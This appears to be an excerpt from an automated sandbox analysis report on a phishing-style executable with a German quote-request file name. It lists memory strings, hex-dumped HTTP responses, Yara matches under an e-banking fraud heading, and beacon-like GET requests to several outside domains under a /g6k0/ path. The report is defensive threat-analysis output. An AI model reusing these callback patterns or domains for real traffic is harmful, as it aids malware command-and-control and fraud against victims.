74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Sat, 09 Apr 2022 07:13:40 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262607800.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262461393.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262435889.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262486349.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262624012.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262537161.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262520522.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262555320.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.266360730.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277699072.00000000063B7000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.273864328.00000000063B7000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263068912.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263138592.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262975141.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html8%;
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263108496.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263449264.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263426943.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263004987.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersF
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263123002.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263156364.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263138592.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersP4
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263138592.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersR
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263502494.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263522637.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersv
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262975141.00000000063E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersx$;
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com9
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comD
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comFR
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom9
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.266360730.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277699072.00000000063B7000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.273864328.00000000063B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comepko
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoD
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoitua
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.260884696.00000000063BE000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.260829842.00000000063BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264361526.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264323030.00000000063BF000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264399524.00000000063C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264361526.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264323030.00000000063BF000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264399524.00000000063C1000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264505324.00000000063C1000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262020412.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.261812005.00000000063B6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262409199.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2v
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262409199.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262229282.00000000063BC000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262080267.00000000063B7000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262046709.00000000063C6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262020412.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.261812005.00000000063B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/8%;
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262409199.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/M
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262409199.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/R
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262046709.00000000063C6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262020412.00000000063C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264065084.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264038069.00000000063BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.260884696.00000000063BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comxg
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262923424.00000000063C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262923424.00000000063C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deet
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.tunnelvisionconference.com
          Source: global trafficHTTP traffic detected: GET /g6k0/?vDKd7h=9rjLcdHx-0r&oT=00OPvUDJVYQxzP7YGwKxSk8Z59zdNvCY+dfImaOG8hbO22YMZXpup+qu2+4V2Jgm5VQN HTTP/1.1Host: www.tunnelvisionconference.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g6k0/?oT=Hip7CMimOk78gxL5CMPku07nV6Z0o8C0cGWx1eP+ie71BFDKkLr5JgybhXBrWtyrNdPh&vDKd7h=9rjLcdHx-0r HTTP/1.1Host: www.terrierslovjt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g6k0/?oT=6RYluMxNX3+UBUvEGFzo52kesULJ7OMzMGVALFRE7BcQ/7Cn+C5GWBVLLjru1ffm4ceC&vDKd7h=9rjLcdHx-0r HTTP/1.1Host: www.10thring.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g6k0/?oT=YhpnqMeKeHQV9hpawJJ8kDg8ped7Wcc3vUTi9AzVcbGOoRzcVA1Xx6BKuahE3Ao/4185&vDKd7h=9rjLcdHx-0r HTTP/1.1Host: www.youcanstores.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g6k0/?oT=1yOpS97qTPJuX4vdeJnQ3O9XBc/xzRMbKQW/nvdMbZZlwvnrgiUHRDWYI6wAZPcgG2JU&vDKd7h=9rjLcdHx-0r HTTP/1.1Host: www.williamhag.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.raw.unpack, type: UNPACKEDPE
